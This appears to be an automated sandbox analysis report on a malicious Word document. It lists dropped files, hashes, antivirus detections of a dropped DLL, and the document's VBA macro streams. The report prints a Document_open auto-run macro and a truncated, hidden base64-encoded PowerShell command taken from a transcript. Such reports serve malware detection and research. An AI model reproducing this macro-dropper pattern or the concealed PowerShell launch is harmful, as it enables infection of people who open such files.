                                                                                                                              Preview: [doc]..v22Pc0qA.doc.LNK=0..v22Pc0qA.doc.LNK=0..[doc]..v22Pc0qA.doc.LNK=0..
                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\v22Pc0qA.doc.LNK
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:53 2020, mtime=Mon Feb 1 21:25:06 2021, atime=Mon Feb 1 21:25:03 2021, length=207253, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2130
                                                                                                                              Entropy (8bit):4.7012569507367346
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:8eEzitpCAKQWAkbbDG7aB6myeEzitpCAKQWAkbbDG7aB6m:8TzitpD9krB6pTzitpD9krB6
                                                                                                                              MD5:749427E569113450C7BA74A05F76CF1C
                                                                                                                              SHA1:1BB4517F99A24C9540CBEE35AB75E8AC818DE60C
                                                                                                                              SHA-256:17706A757CF169FFFAADE647211ADD561581721F26DFE0D62E427A82D6AEA4A6
                                                                                                                              SHA-512:944A79BE7B7306A7166F1626562528A43168C3CE9A649C61923ED0D9AC0C09B7952FFFEBA5F2C5F24740AF7A086BF0B65103C12AE635C72D514216662F537ED3
                                                                                                                              Malicious:false
                                                                                                                              Preview: L..................F.... ....B.S....?5...............)...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..AR......................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N..AR......#J....................I0H.j.o.n.e.s.....~.1.....>Q}<..Desktop.h.......N..AR.......Y..............>.......X.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2..)..AR". .V22PC0~1.DOC..R......>Q{<AR"......V......................U.v.2.2.P.c.0.q.A...d.o.c...d.o.c.......V...............-.......U...........>.S......C:\Users\user\Desktop\v22Pc0qA.doc.doc..'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.v.2.2.P.c.0.q.A...d.o.c...d.o.c.........:..,.LB.)...As...`.......X.......724536...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........
                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):162
                                                                                                                              Entropy (8bit):2.537027933460949
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Rl/ZdHpljlqKVCd9lqKJBZpMDZl:RtZBplUOCdKSBZpMDZl
                                                                                                                              MD5:62D2E9D0E5A00A4933B40C773F2A3521
                                                                                                                              SHA1:D129090958A7122B098FD1CDE5A80D5FF74E9CF5
                                                                                                                              SHA-256:61314B84034510BCE3DEF89D73551BE6385E9FF831736409B9A0843325927252
                                                                                                                              SHA-512:563CF8AA385591CCEAE68A2E3E61D0CC7E4567A7D0C6B11BFAAEE690569C1A0194D7CF1CFA18B9FD8BBE4A61DB1BDD3C52AD0A913FC5498F42E2CE36BEEF2D78
                                                                                                                              Malicious:false
                                                                                                                              Preview: .pratesh................................................p.r.a.t.e.s.h..........@q.............H.......6C.......@}.............T.......6C.......@y.......lpc......
                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):22
                                                                                                                              Entropy (8bit):2.9808259362290785
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:QAlX0Gn:QKn
                                                                                                                              MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                              SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                              SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                              SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                              Malicious:false
                                                                                                                              Preview: ....p.r.a.t.e.s.h.....
                                                                                                                              C:\Users\user\Desktop\~$2Pc0qA.doc.doc
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):162
                                                                                                                              Entropy (8bit):2.537027933460949
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Rl/ZdHpljlqKVCd9lqKJBZpMDZl:RtZBplUOCdKSBZpMDZl
                                                                                                                              MD5:62D2E9D0E5A00A4933B40C773F2A3521
                                                                                                                              SHA1:D129090958A7122B098FD1CDE5A80D5FF74E9CF5
                                                                                                                              SHA-256:61314B84034510BCE3DEF89D73551BE6385E9FF831736409B9A0843325927252
                                                                                                                              SHA-512:563CF8AA385591CCEAE68A2E3E61D0CC7E4567A7D0C6B11BFAAEE690569C1A0194D7CF1CFA18B9FD8BBE4A61DB1BDD3C52AD0A913FC5498F42E2CE36BEEF2D78
                                                                                                                              Malicious:false
                                                                                                                              Preview: .pratesh................................................p.r.a.t.e.s.h..........@q.............H.......6C.......@}.............T.......6C.......@y.......lpc......
                                                                                                                              C:\Users\user\Documents\20210201\PowerShell_transcript.724536.D_cV0UCD.20210201232511.txt
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):11663
                                                                                                                              Entropy (8bit):5.028707508716467
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:yS0NsjXDzcYlm8nuVF9M1GBgovhkssrx0DYQ4+B5mxEk:6kXDTUvhk7x0Dxlm1
                                                                                                                              MD5:870345A71AAB7D049F25966FF1779C26
                                                                                                                              SHA1:8BAE23F02C27D9A661D44B25584E5196752051AD
                                                                                                                              SHA-256:FCA635B949AAA3782CBD70493B1CBBF8CBBB1DB4D6183136DF335A615F081B09
                                                                                                                              SHA-512:A5BEADCAB0A2F4C1663830365F5940102F653202A14316E85A6A9AF9D3351D04045E8D9D354D82C39FD6AB942AF4BFDA04F78789D2B93B7A3A75E7ED9B9BD13E
                                                                                                                              Malicious:false
                                                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210201232511..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 724536 (Microsoft Windows NT 10.0.17134.0)..Host Application: POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACk
                                                                                                                              C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):228352
                                                                                                                              Entropy (8bit):7.401227982577977
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:Q2JsbTQ7oRiTPy6758RAuiGsIwuVKiCJ0/ykN8t+XPjf7z3I43:Q2JCIoRSi1iGsuwfJ0KkU+XPjQ
                                                                                                                              MD5:1BCF5E93610C3774A59240E10932A252
                                                                                                                              SHA1:61D3C80B5E71F136E2D7039AA9D5F41E2595BBF0
                                                                                                                              SHA-256:F5736A1F0C40D3609BA0C394FE424795D71E19A6B57AB55CA9C6F49B79485C27
                                                                                                                              SHA-512:1D57B47A0134D09677AA18356A0A351D335414901BB8B35DA31ACFA43CFBB3F1C76ECEB14F98E915495ECB923BEA23C3F9BC5D711F041F44DCAD6142071B23F2
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: Metadefender, Detection: 56%, Browse
                                                                                                                              • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.LC.."..."...".......".....a."...#.d.".:4Y...".....%.".......".......".......".Rich..".........................PE..L....H._...........!.....J..........uz.......`.......................................W..............................p...I.......<......................................................................@............`..\............................text...wH.......J.................. ..`.rdata...G...`...H...N..............@..@.data...d2..........................@....rsrc...............................@..@.reloc...".......$...X..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                              Static File Info

                                                                                                                              General

                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: extensible Automotive generate withdrawal Wooden Global architecture, Author: Chlo Gerard, Template: Normal.dotm, Last Saved By: Thomas Roussel, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 21 13:51:00 2020, Last Saved Time/Date: Mon Dec 21 13:51:00 2020, Number of Pages: 1, Number of Words: 5943, Number of Characters: 33877, Security: 8
                                                                                                                              Entropy (8bit):6.406111255633529
                                                                                                                              TrID:
                                                                                                                              • Microsoft Word document (32009/1) 54.23%
                                                                                                                              • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                                                                                              File name:v22Pc0qA.doc.doc
                                                                                                                              File size:207253
                                                                                                                              MD5:7a7d325948481b0557b035249bf5c96a
                                                                                                                              SHA1:0529727ffad8388fc94155d1652ca65189cda5df
                                                                                                                              SHA256:47e4926bc53fb131b2e976d7b1c2f4b3c0f665242aa493d7e21b4df773b60919
                                                                                                                              SHA512:45cf99bad712aaace79010c728705117fc12ac76d76f625716115a19477ce40de5d18ecaca8e84ea55c388d4436d4827ab63c660df86dcdc01c5c8ce975dda44
                                                                                                                              SSDEEP:3072:MD9ufstRUUKSns8T00JSHUgteMJ8qMD7g5bkxU7PoU2l65gsaTs:Y9ufsfgIf0pLkU7PoU2lIgsaTs
                                                                                                                              File Content Preview:........................>.......................9...........<...............6...7...8..........................................................................................................................................................................

                                                                                                                              File Icon

                                                                                                                              Icon Hash:74f4c4c6c1cac4d8

                                                                                                                              Static OLE Info

                                                                                                                              General

                                                                                                                              Document Type:OLE
                                                                                                                              Number of OLE Files:1

                                                                                                                              OLE File "v22Pc0qA.doc.doc"

                                                                                                                              Indicators

                                                                                                                              Has Summary Info:True
                                                                                                                              Application Name:Microsoft Office Word
                                                                                                                              Encrypted Document:False
                                                                                                                              Contains Word Document Stream:True
                                                                                                                              Contains Workbook/Book Stream:False
                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                              Contains Visio Document Stream:False
                                                                                                                              Contains ObjectPool Stream:
                                                                                                                              Flash Objects Count:
                                                                                                                              Contains VBA Macros:True

                                                                                                                              Summary

                                                                                                                              Code Page:1252
                                                                                                                              Title:
                                                                                                                              Subject:extensible Automotive generate withdrawal Wooden Global architecture
                                                                                                                              Author:Chlo Gerard
                                                                                                                              Keywords:
                                                                                                                              Comments:
                                                                                                                              Template:Normal.dotm
                                                                                                                              Last Saved By:Thomas Roussel
                                                                                                                              Revion Number:1
                                                                                                                              Total Edit Time:0
                                                                                                                              Create Time:2020-12-21 13:51:00
                                                                                                                              Last Saved Time:2020-12-21 13:51:00
                                                                                                                              Number of Pages:1
                                                                                                                              Number of Words:5943
                                                                                                                              Number of Characters:33877
                                                                                                                              Creating Application:Microsoft Office Word
                                                                                                                              Security:8

                                                                                                                              Document Summary

                                                                                                                              Document Code Page:1252
                                                                                                                              Number of Lines:282
                                                                                                                              Number of Paragraphs:79
                                                                                                                              Thumbnail Scaling Desired:False
                                                                                                                              Company:
                                                                                                                              Contains Dirty Links:False
                                                                                                                              Shared Document:False
                                                                                                                              Changed Hyperlinks:False
                                                                                                                              Application Version:983040

                                                                                                                              Streams with VBA

                                                                                                                              VBA File Name: UserForm1, Stream Size: -1
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm1
                                                                                                                              VBA File Name:UserForm1
                                                                                                                              Stream Size:-1
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              False
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E4811F3D-9F01-4BC4-95D4-D40026D931D3}{41345D1C-9C4E-4385-B780-C54CCB7ABE17}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                              VBA File Name: UserForm2, Stream Size: -1
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm2
                                                                                                                              VBA File Name:UserForm2
                                                                                                                              Stream Size:-1
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{AF4533AC-BBF6-4979-BA91-9D2D4959595A}{3CF58CA5-D4D4-49F7-BA7F-F124E45D0A17}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                              VBA File Name: UserForm3, Stream Size: -1
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm3
                                                                                                                              VBA File Name:UserForm3
                                                                                                                              Stream Size:-1
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{A4835EEF-81F1-4677-BAA3-01DF6CF2C26F}{ADE6D7C4-3411-4730-A534-6D8AAFEFBA8F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                              VBA File Name: UserForm4, Stream Size: -1
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm4
                                                                                                                              VBA File Name:UserForm4
                                                                                                                              Stream Size:-1
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VB_Base
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{4FA002EA-017C-4E93-9C6B-22A1ABC6E370}{C27736E2-CDA0-4100-9FCF-E22B5D354CA0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                              VBA File Name: UserForm5, Stream Size: -1
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm5
                                                                                                                              VBA File Name:UserForm5
                                                                                                                              Stream Size:-1
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{B4698655-398F-452C-B828-35D501CBBA3E}{6D1A2E80-5267-422A-B1BA-58F578BA8D71}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                              VBA File Name: Dk5att0cu_9jsb, Stream Size: 1114
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/Dk5att0cu_9jsb
                                                                                                                              VBA File Name:Dk5att0cu_9jsb
                                                                                                                              Stream Size:1114
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . T 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 11 c0 54 37 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              Private
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Creatable
                                                                                                                              VB_Name
                                                                                                                              Document_open()
                                                                                                                              VB_Customizable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "Dk5att0cu_9jsb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Joieredaxt98oc6o
End Sub
                                                                                                                              VBA File Name: Lxvinhyq0hu0i, Stream Size: 16887
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/Lxvinhyq0hu0i
                                                                                                                              VBA File Name:Lxvinhyq0hu0i
                                                                                                                              Stream Size:16887
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 8c 08 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 93 08 00 00 1f 30 00 00 00 00 00 00 01 00 00 00 11 c0 34 97 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              "cBBImVFtj.VfOyHcZeG.KTQGJQv"
                                                                                                                              MVKdEA
                                                                                                                              "iYrsMDeBF.SIoiFJ.zdnAB"
                                                                                                                              "cfmqZH.yHFfXEyD.iUezXEC"
                                                                                                                              TFhBESFIX
                                                                                                                              yqztDCl:
                                                                                                                              VBA.Replace
                                                                                                                              jSGTCFaK:
                                                                                                                              hVRJE
                                                                                                                              "HGXMmlZoZ.jEXaTVE.zeocvMGG"
                                                                                                                              RZyrFJ
                                                                                                                              sbVXlJE:
                                                                                                                              aDFRF
                                                                                                                              KAedr
                                                                                                                              "ObyEHIBL.hGKABcIQ.yeYrFAOmg"
                                                                                                                              RMyrFd
                                                                                                                              qLfbCLdC
                                                                                                                              GLxLQDxBB
                                                                                                                              KiOKSNEG:
                                                                                                                              PrigNJEs
                                                                                                                              nCWvB
                                                                                                                              RhecDCNb:
                                                                                                                              YaqiI
                                                                                                                              yDuIa
                                                                                                                              aDFRF:
                                                                                                                              Binary
                                                                                                                              hckCCJvD:
                                                                                                                              UbSMfKFUj
                                                                                                                              CtmaxWDYG
                                                                                                                              dcClB:
                                                                                                                              VipWJ:
                                                                                                                              jSGTCFaK
                                                                                                                              IpXGAFACy
                                                                                                                              jWIUH
                                                                                                                              yqztDCl
                                                                                                                              "aguCEDpx.XlUcBUj.UPogGhX"
                                                                                                                              "zSasAJg.LDOIU.vvZOFJ"
                                                                                                                              "AtMXEHJGF.tPVXDfJI.vNeXEIF"
                                                                                                                              wVgZExzI
                                                                                                                              "gtvUAW.KeNGGlEDI.FCFXBEHbH"
                                                                                                                              hkpqEBd
                                                                                                                              FEJNFPMF
                                                                                                                              uYPoFiE
                                                                                                                              XvETIO
                                                                                                                              pxMXSJrIc:
                                                                                                                              dcClB
                                                                                                                              VIuzQOE:
                                                                                                                              "zpGvEhCHv.ZNcWIJcU.qeFzJB"
                                                                                                                              "gEMlED.skZhEggk.ZyWBD"
                                                                                                                              FzSmxUBI:
                                                                                                                              IIJMEYBZ
                                                                                                                              JubeVI
                                                                                                                              "QWkiJ.sNlBSC.hsUWFP"
                                                                                                                              BRfTAJ
                                                                                                                              lOYxmwBA
                                                                                                                              IIJMEYBZ:
                                                                                                                              UFEneAQF
                                                                                                                              FzOAw
                                                                                                                              "eKLzaJBKG.eCACJBH.NfdiGiC"
                                                                                                                              Resume
                                                                                                                              iAKfBEDC:
                                                                                                                              QqQRUOBIy
                                                                                                                              "nRpjIJ.tkIcCAbCF.hJzbH"
                                                                                                                              yHCsJFACD
                                                                                                                              lfjdHL
                                                                                                                              mxDIrHC
                                                                                                                              hckCCJvD
                                                                                                                              DxojDGC
                                                                                                                              rDIcxFB:
                                                                                                                              NwlcQEELI
                                                                                                                              eYojg
                                                                                                                              JXblRBK:
                                                                                                                              kaqktK
                                                                                                                              olbDbIA:
                                                                                                                              nCWvB:
                                                                                                                              "bfJqAKr.cLEdAF.oYWiAFEQ"
                                                                                                                              lbHAbDF:
                                                                                                                              ZqNrvaa:
                                                                                                                              kmOCpG
                                                                                                                              FoTWuD:
                                                                                                                              ChrW(wdKeyS)
                                                                                                                              bVAPDAD
                                                                                                                              "ZbLbn.FiqyBGPC.ROWoCHF"
                                                                                                                              cHoJJlDBJ
                                                                                                                              "CXrJJB.OBfnW.uqEngDYV"
                                                                                                                              "BpfOu.TVoTOHe.EzrPEDJ"
                                                                                                                              "rqFdfCgk.WuMsFCHq.wYpcBKVBP"
                                                                                                                              ObUqEpuD:
                                                                                                                              NwlcQEELI:
                                                                                                                              "pJlGBGe.jIXSWL.jkAfAEIf"
                                                                                                                              "hSzhx.onZqBBzG.aRYCE"
                                                                                                                              VB_Name
                                                                                                                              AJXECAN
                                                                                                                              ZxZNGGUBd:
                                                                                                                              IaIuovC:
                                                                                                                              WnWcBBeF
                                                                                                                              IaIuovC
                                                                                                                              "TNqlmI.VQzWNlJC.IuleF"
                                                                                                                              gvnNjywC:
                                                                                                                              "ErIlZF.tHbIE.idUJKwuOi"
                                                                                                                              oVlMEI
                                                                                                                              NJlsEIS
                                                                                                                              JxVVF
                                                                                                                              RWlYF
                                                                                                                              "ZFWwdLJFE.FcQNSnyB.yuKyrJAD"
                                                                                                                              "KeuGF.APuwUHxl.GiUhBFB"
                                                                                                                              fGzqP:
                                                                                                                              uJknJZHFB:
                                                                                                                              yJzxGZak
                                                                                                                              PksXIAC:
                                                                                                                              "obWgmFILu.KLSrfFHDI.nylpN"
                                                                                                                              "AcrzGL.zwvmHG.MqsxCr"
                                                                                                                              UbSMfKFUj:
                                                                                                                              kmOCpG:
                                                                                                                              "XIjXFFFIJ.jYAPtLTyj.PLtLFT"
                                                                                                                              Attribute
                                                                                                                              lfRjBXXFA:
                                                                                                                              lfRjBXXFA
                                                                                                                              fGzqP
                                                                                                                              VIuzQOE
                                                                                                                              RMyrFd:
                                                                                                                              JXblRBK
                                                                                                                              YEAwF
                                                                                                                              nhVWCG:
                                                                                                                              "BiUfo.vtUVwAWGC.hUSLqGGIO"
                                                                                                                              MVKdEA:
                                                                                                                              "oScEJFIH.GpYhI.ZPvpk"
                                                                                                                              iZGGBKjGH
                                                                                                                              "DcfnrACC.XeVEC.QdSVCUJ"
                                                                                                                              ohdoz
                                                                                                                              uJtiAP
                                                                                                                              "WWmJGCEWG.XCrNGJ.ficHzH"
                                                                                                                              cIiApH
                                                                                                                              LjVfJ
                                                                                                                              qLfbCLdC:
                                                                                                                              zHYrT
                                                                                                                              sbVXlJE
                                                                                                                              sCwjljF
                                                                                                                              JHGODJK
                                                                                                                              XvETIO:
                                                                                                                              BrrXfI
                                                                                                                              JzcNByvAX
                                                                                                                              "DbRqLDGCg.nxwYCaF.sZZrJ"
                                                                                                                              nmHtBKNIA
                                                                                                                              uJknJZHFB
                                                                                                                              kMzKEr:
                                                                                                                              pxMXSJrIc
                                                                                                                              "pPiJFZzI.dfizGxy.NRcSrA"
                                                                                                                              KiOKSNEG
                                                                                                                              SEnkGD
                                                                                                                              "nYskWX.aOSpmAFIB.kCBksCD"
                                                                                                                              "gjoHAq.pgiDH.iYppCzD"
                                                                                                                              HMJCGGAMi
                                                                                                                              "RSIiW.JGdvBjSmB.WubTFJ"
                                                                                                                              xuAPcBl
                                                                                                                              xuAPcBl:
                                                                                                                              jJMCQJDB:
                                                                                                                              nhVWCG
                                                                                                                              LjVfJ:
                                                                                                                              zHYrT:
                                                                                                                              kMzKEr
                                                                                                                              lbHAbDF
                                                                                                                              "YNveE.qehAq.fHHuGb"
                                                                                                                              "eHqqE.nCeMDET.kZWuQGE"
                                                                                                                              ZuuLFE
                                                                                                                              EhrmhuB
                                                                                                                              "NhKID.SYBhRIEGg.qCLeaM"
                                                                                                                              "NPkiDT.CkfBJvJ.bgnwZAB"
                                                                                                                              "fNHCB.hbEBBG.feKiwC"
                                                                                                                              IGamxCG
                                                                                                                              ZuuLFE:
                                                                                                                              jWIUH:
                                                                                                                              "MiwKq.hkWsDcI.YmoTAGR"
                                                                                                                              "NgFRIFlFQ.imXZAJE.tzzlC"
                                                                                                                              RhecDCNb
                                                                                                                              nmHtBKNIA:
                                                                                                                              WpdDxhHa
                                                                                                                              VipWJ
                                                                                                                              PksXIAC
                                                                                                                              String
                                                                                                                              gvnNjywC
                                                                                                                              eTuZIDG
                                                                                                                              kySRBFED
